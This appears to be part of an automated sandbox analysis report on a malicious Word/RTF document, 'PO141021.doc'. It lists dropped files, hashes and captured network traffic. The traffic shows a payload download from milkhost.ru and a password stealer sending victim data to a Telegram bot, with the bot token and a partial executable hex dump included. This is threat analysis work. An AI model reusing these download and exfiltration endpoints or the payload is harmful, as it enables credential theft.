                                                                                    Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\PO141021.LNK
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:55 2021, mtime=Mon Aug 30 20:08:55 2021, atime=Thu Oct 14 16:35:13 2021, length=104541, window=hide
                                                                                    Category:dropped
                                                                                    Size (bytes):1004
                                                                                    Entropy (8bit):4.490732923232248
                                                                                    Encrypted:false
                                                                                    SSDEEP:24:8RgqVw/XTTc+bj7fQHeiCQiDv3qGniE/7Eg:8Tq/XTA+HK5GiWB
                                                                                    MD5:C1B5713041A6C948DC8B4A7D9347B92D
                                                                                    SHA1:5DC78C646C15F9173BF769CB7973916A96D88029
                                                                                    SHA-256:B060578DF0D1005651F035FA0CBB390A2B7596790945F237091BC1FD135FE479
                                                                                    SHA-512:285372BB543A7433344D73E88479058F9A6775FD8366C1869678887EECC399BE527AEFB2E13D685B128C6EA45CB68BC064C08DF0E8950C530781B21C652D8C47
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: L..................F.... ....92>....92>....d(.!...]............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......S....user.8......QK.X.S..*...&=....U...............A.l.b.u.s.....z.1......S ...Desktop.d......QK.X.S .*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....b.2.]...NSg. .PO141021.doc..F.......S...S..*.........................P.O.1.4.1.0.2.1...d.o.c.......v...............-...8...[............?J......C:\Users\..#...................\\141700\Users.user\Desktop\PO141021.doc.#.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.O.1.4.1.0.2.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......141700..........D_....3N...W...9..g............[D_....3N...W...9..g............[
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):67
                                                                                    Entropy (8bit):4.59044707940377
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:bDuMJltIarulmX1gTarulv:bCmIaru1Taru1
                                                                                    MD5:2A3D3B1490094BBA3C4AA5F1C810C0C8
                                                                                    SHA1:62C2A898F16EAD12ACA0081FEB6BCB79EB1EC63A
                                                                                    SHA-256:2133D7D2965CD863483469424A4235047458225E9E4A928C4DC78AA572256001
                                                                                    SHA-512:644C09CD6B5AA9B3009F4F088A0D126B04AC5DC8A1472A085F5643DDCF268B2511E77C2510ACA26B14BF1DA8FEBACCAEF929234C3A869F0415E0AFD411C4D8AE
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview: [folders]..Templates.LNK=0..PO141021.LNK=0..[doc]..PO141021.LNK=0..
                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):162
                                                                                    Entropy (8bit):2.5038355507075254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                    Malicious:false
                                                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
                                                                                    C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):486912
                                                                                    Entropy (8bit):6.762794264214071
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:yUfjnaH1FrQKkmWSc/kmGBbxiB7C7r/vHMUHvVgqA:irlkmWdGNxih2MUHvVgqA
                                                                                    MD5:D1BAA9515F4C67A7B561938BBD81BC75
                                                                                    SHA1:E83E455F636443C9F62D8C480FF060F7BB6DE3BE
                                                                                    SHA-256:1FAC59451F582122CB2E5787E3A936A3001081DE3469E168207DA1A357DF691D
                                                                                    SHA-512:2FC1E9B771191C52794F99AE1C1CAF70100C2A129634CA230EFA4007145C27D8AE7997AF83B6077BB6702B0D85EEB9F5429096ADAE6D2CC0601DCE0F4F5E171D
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga.................V..........>t... ........@.. ....................................@..................................s..W.................................................................................... ............... ..H............text...DT... ...V.................. ..`.rsrc................X..............@..@.reloc...............l..............@..B................ t......H..................\....B...b..........................................Ivan Medvedev...2~'....(....*..(....*2~5....(....*..{....*"..}....*..{....*"..}....*..{....*"..}....*R~;....(.....{......*..{....*"..}....*..{....*"..}....*..{....*"..}....*.~>...~<....(....rKH.p~=....(....(....*..{....*"..}....*..{....*"..}....*N.(....~?.....(....*..{....*"..}....*.~>...~@....(....rOH.p~B...raH.p~A....(.....d...(....(....*>..(O.....}....*>.{.....{....Zl*>..(O.....}....*f.{.....{....Zl#.-
                                                                                    C:\Users\user\Desktop\~$141021.doc
                                                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):162
                                                                                    Entropy (8bit):2.5038355507075254
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:vrJlaCkWtVyEGlBsB2q/WWqlFGa1/ln:vdsCkWtYlqAHR9l
                                                                                    MD5:45B1E2B14BE6C1EFC217DCE28709F72D
                                                                                    SHA1:64E3E91D6557D176776A498CF0776BE3679F13C3
                                                                                    SHA-256:508D8C67A6B3A7B24641F8DEEBFB484B12CFDAFD23956791176D6699C97978E6
                                                                                    SHA-512:2EB6C22095EFBC366D213220CB22916B11B1234C18BBCD5457AB811BE0E3C74A2564F56C6835E00A0C245DF964ADE3697EFA4E730D66CC43C1C903975F6225C0
                                                                                    Malicious:false
                                                                                    Preview: .user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                    Static File Info

                                                                                    General

                                                                                    File type:Rich Text Format data, unknown version
                                                                                    Entropy (8bit):5.819318498687373
                                                                                    TrID:
                                                                                    • Rich Text Format (5005/1) 55.56%
                                                                                    • Rich Text Format (4004/1) 44.44%
                                                                                    File name:PO141021.doc
                                                                                    File size:104541
                                                                                    MD5:9095b4b704c9f1ef75cc683b57e1f207
                                                                                    SHA1:d88b99fc3fff5eac59d7fedd136fd467f1c17106
                                                                                    SHA256:10df15707ce5a8b457ebccab5f4a5c3b2548ea755bc11666f5601583677f17b5
                                                                                    SHA512:20ec8779f1ec2ac8accc0b002a0875ac054b65b6bb9d5781f30706c1b6d7fc323c0ed11262a1f95fb77a3b4dcff1acee8519b180c52ba6a4575ad531090de720
                                                                                    SSDEEP:1536:bSEyBiaxTw33eWw9V698GpucnuCyYhPcLgVrDsDuofCXzsXhZ7+RboVsOA1tGn5t:hYw3uKDcUpsDADsXA3gOtA
                                                                                    File Content Preview:{\rtf91886;'...??`.%0~.[1_||????!.5|[!9011<)?=,38<,%<^%.?[]6>+:?.;5?#4..`?,<,^/|<.^)08.??9$78]&==-5)(??`,@7!?[#4_=12-.<&!.1?@](>%#@[7-5^+?92@64~%?.+<$?[38=4/62;.=[966|@.;/^2*.]`1*8%/+:)~.2!:~99_]~3%.$50<5036?27.1=;3$=(.28/?9-%_%+_?-/&<30.$'[@:.=&.&^_/?|??

                                                                                    File Icon

                                                                                    Icon Hash:e4eea2aaa4b4b4a4

                                                                                    Static RTF Info

                                                                                    Objects

                                                                                    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                                                    0000002AEhno
                                                                                    100000291hno

                                                                                    Network Behavior

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2021 10:34:58.288450956 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.327896118 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.327985048 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.328747034 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.368168116 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368735075 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368786097 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368824005 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368855953 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.368863106 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368901014 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368901014 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.368938923 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.368949890 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.368977070 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.369000912 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.369024992 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.369040966 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.369066954 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.369087934 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.369103909 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.369131088 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.369173050 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.389110088 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408457041 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408509016 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408548117 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408550978 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408586025 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408602953 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408607960 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408623934 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408633947 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408669949 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408682108 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408725023 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408726931 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408761978 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408763885 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408801079 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408809900 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408852100 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408852100 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408890963 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408891916 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408930063 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408931017 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.408967972 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.408977985 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409004927 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409008026 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409043074 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409055948 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409082890 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409096956 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409137011 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409162045 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409208059 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409208059 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409238100 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409245014 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409246922 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409282923 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.409285069 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409323931 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.409729004 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448632956 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448688030 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448721886 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448724031 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448745966 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448762894 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448767900 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448801994 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448810101 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448847055 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448849916 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448892117 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448895931 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448930025 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448939085 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.448970079 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.448975086 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449008942 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449013948 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449044943 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449053049 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449083090 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449089050 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449120998 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449145079 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449157953 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449167967 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449209929 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449213982 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449249029 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449279070 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449280024 CEST804916795.216.94.72192.168.2.22
                                                                                    Oct 14, 2021 10:34:58.449290991 CEST4916780192.168.2.2295.216.94.72
                                                                                    Oct 14, 2021 10:34:58.449321032 CEST804916795.216.94.72192.168.2.22

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2021 10:34:58.163742065 CEST5216753192.168.2.228.8.8.8
                                                                                    Oct 14, 2021 10:34:58.266063929 CEST53521678.8.8.8192.168.2.22
                                                                                    Oct 14, 2021 10:36:56.684036970 CEST5059153192.168.2.228.8.8.8
                                                                                    Oct 14, 2021 10:36:56.701877117 CEST53505918.8.8.8192.168.2.22

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                    Oct 14, 2021 10:34:58.163742065 CEST192.168.2.228.8.8.80x3047Standard query (0)milkhost.ruA (IP address)IN (0x0001)
                                                                                    Oct 14, 2021 10:36:56.684036970 CEST192.168.2.228.8.8.80xbaafStandard query (0)api.telegram.orgA (IP address)IN (0x0001)

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                    Oct 14, 2021 10:34:58.266063929 CEST8.8.8.8192.168.2.220x3047No error (0)milkhost.ru95.216.94.72A (IP address)IN (0x0001)
                                                                                    Oct 14, 2021 10:36:56.701877117 CEST8.8.8.8192.168.2.220xbaafNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • api.telegram.org
                                                                                    • milkhost.ru

                                                                                    HTTP Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    TimestampkBytes transferredDirectionData


                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    1192.168.2.224916795.216.94.7280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    Oct 14, 2021 10:34:58.328747034 CEST0OUTGET /trasper/goshcj.exe HTTP/1.1
                                                                                    Accept: */*
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                    Host: milkhost.ru
                                                                                    Connection: Keep-Alive
                                                                                    Oct 14, 2021 10:34:58.368735075 CEST2INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Thu, 14 Oct 2021 08:34:58 GMT
                                                                                    Content-Type: application/x-msdownload
                                                                                    Content-Length: 486912
                                                                                    Connection: keep-alive
                                                                                    Last-Modified: Thu, 14 Oct 2021 01:52:01 GMT
                                                                                    Expires: Mon, 13 Dec 2021 08:34:58 GMT
                                                                                    Cache-Control: max-age=5184000
                                                                                    Pragma: public
                                                                                    Accept-Ranges: bytes
                                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 17 8c 67 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 07 00 00 16 00 00 00 00 00 00 3e 74 07 00 00 20 00 00 00 80 07 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 07 00 00 02 00 00 c9 1f 08 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 73 07 00 57 00 00 00 00 80 07 00 d0 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 07 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 54 07 00 00 20 00 00 00 56 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 13 00 00 00 80 07 00 00 14 00 00 00 58 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 07 00 00 02 00 00 00 6c 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 74 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e4 a4 06 00 00 cf 00 00 02 00 00 00 5c 00 00 06 04 42 03 00 df 62 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 49 76 61 6e 20 4d 65 64 76 65 64 65 76 00 00 00 32 7e 27 00 00 04 02 28 c0 00 00 06 2a 1e 02 28 a0 00 00 0a 2a 32 7e 35 00 00 04 02 28 09 01 00 06 2a 1e 02 7b a0 00 00 04 2a 22 02 03 7d a0 00 00 04 2a 1e 02 7b a1 00 00 04 2a 22 02 03 7d a1 00 00 04 2a 1e 02 7b a2 00 00 04 2a 22 02 03 7d a2 00 00 04 2a 52 7e 3b 00 00 04 03 28 06 01 00 06 02 7b a3 00 00 04 fe 01 2a 1e 02 7b a4 00 00 04 2a 22 02 03 7d a4 00 00 04 2a 1e 02 7b a5 00 00 04 2a 22 02 03 7d a5 00 00 04 2a 1e 02 7b a6 00 00 04 2a 22 02 03 7d a6 00 00 04 2a 9a 7e 3e 00 00 04 7e 3c 00 00 04 02 28 09 01 00 06 72 4b 48 00 70 7e 3d 00 00 04 02 28 09 01 00 06 28 11 01 00 06 2a 1e 02 7b a7 00 00 04 2a 22 02 03 7d a7 00 00 04 2a 1e 02 7b a8 00 00 04 2a 22 02 03 7d a8 00 00 04 2a 4e 02 28 a0 00 00 0a 7e 3f 00 00 04 02 03 28 fe 00 00 06 2a 1e 02 7b a9 00 00 04 2a 22 02 03 7d a9 00 00 04 2a ea 7e 3e 00 00 04 7e 40 00 00 04 02 28 09 01 00 06 72 4f 48 00 70 7e 42 00 00 04 72 61 48 00 70 7e 41 00 00 04 02 28 14 01 00 06 8c 64 00 00 01 28 17 01 00 06 28 11 01 00 06 2a 3e 02 04 28 4f 00 00 06 02 03 7d aa 00 00 04 2a 3e 02 7b aa 00 00 04 02 7b aa 00 00 04 5a 6c 2a 3e 02 04 28 4f 00 00 06 02 03 7d ab 00 00 04 2a 66 02 7b ab 00 00 04 02 7b ab 00 00 04 5a 6c 23 18 2d 44 54 fb 21 09 40 5a 2a 5a 02 05 28 4f 00 00 06 02 03 7d ac 00 00 04
                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgaV>t @ @sW H.textDT V `.rsrcX@@.relocl@B tH\BbIvan Medvedev2~'(*(*2~5(*{*"}*{*"}*{*"}*R~;({*{*"}*{*"}*{*"}*~>~<(rKHp~=((*{*"}*{*"}*N(~?(*{*"}*~>~@(rOHp~BraHp~A(d((*>(O}*>{{Zl*>(O}*f{{Zl#-DT!@Z*Z(O}


                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                    0192.168.2.2249169149.154.167.220443C:\Users\user\AppData\Roaming\godsawqop.exe
                                                                                    TimestampkBytes transferredDirectionData
                                                                                    2021-10-14 08:36:57 UTC0OUTPOST /bot1923392915:AAHa8aKPuVKh5L9QUsA47Z5cQ-J2e00kH0Y/sendDocument HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=---------------------------8d98f2463ef5aa5
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 1023
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    2021-10-14 08:36:57 UTC0INHTTP/1.1 100 Continue
                                                                                    2021-10-14 08:36:57 UTC0OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 34 36 33 65 66 35 61 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 39 39 31 37 39 37 33 36 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 66 32 34 36 33 65 66 35 61 61 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 50 57 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 55 73 65 72 20 4e 61 6d 65 3a 20 41 6c 62 75 73 2f 31 34 31 37 30 30 0a 4f 53 46 75 6c 6c
                                                                                    Data Ascii: -----------------------------8d98f2463ef5aa5Content-Disposition: form-data; name="chat_id"1991797369-----------------------------8d98f2463ef5aa5Content-Disposition: form-data; name="caption"New PW Recovered!User Name: user/141700OSFull
                                                                                    2021-10-14 08:36:57 UTC1INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Thu, 14 Oct 2021 08:36:57 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 617
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    {"ok":true,"result":{"message_id":261,"from":{"id":1923392915,"is_bot":true,"first_name":"deman","username":"deman007_bot"},"chat":{"id":1991797369,"first_name":"Smith","last_name":"Kelvin","type":"private"},"date":1634200617,"document":{"file_name":"user-141700 2021-10-14 03-06-50.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIBBWFn7CmVA21FS8mBJm7hCL2D0uF0AAKyCAACuulBU-ee8Fkid0p2IQQ","file_unique_id":"AgADsggAArrpQVM","file_size":444},"caption":"New PW Recovered!\n\nUser Name: user/141700\nOSFullName: Microsoft Windows 7 Professional \nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior

                                                                                    Click to jump to process

                                                                                    System Behavior

                                                                                    General

